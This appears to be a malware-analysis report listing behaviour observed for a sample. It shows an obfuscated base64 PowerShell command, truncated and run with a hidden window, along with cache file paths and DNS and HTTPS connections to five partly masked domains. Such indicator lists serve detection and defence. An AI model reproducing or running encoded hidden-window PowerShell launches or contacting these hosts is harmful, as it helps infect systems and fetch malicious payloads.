Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAG8AdQBqAHcAaQBvAGgAYwBvAGkAcwBiAG8AYQBzAGwAaQBlAHAAPQAnAGgAZQBhAGQAcQB1AG8AZQB6AHkAdQB1AHYAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBgAGUAYwB1AF...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- 'el####ektrikci.com':443
- 'rv###deals.com':443
- 'sk###lish.com':443
- 'pa#####moversmohali.com':443
- 'tr###omma.com':443
- DNS ASK el####ektrikci.com
- DNS ASK rv###deals.com
- DNS ASK sk###lish.com
- DNS ASK pa#####moversmohali.com
- DNS ASK tr###omma.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAG8AdQBqAHcAaQBvAGgAYwBvAGkAcwBiAG8AYQBzAGwAaQBlAHAAPQAnAGgAZQBhAGQAcQB1AG8AZQB6AHkAdQB1AHYAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBgAGUAYwB1AF...' (with hidden window)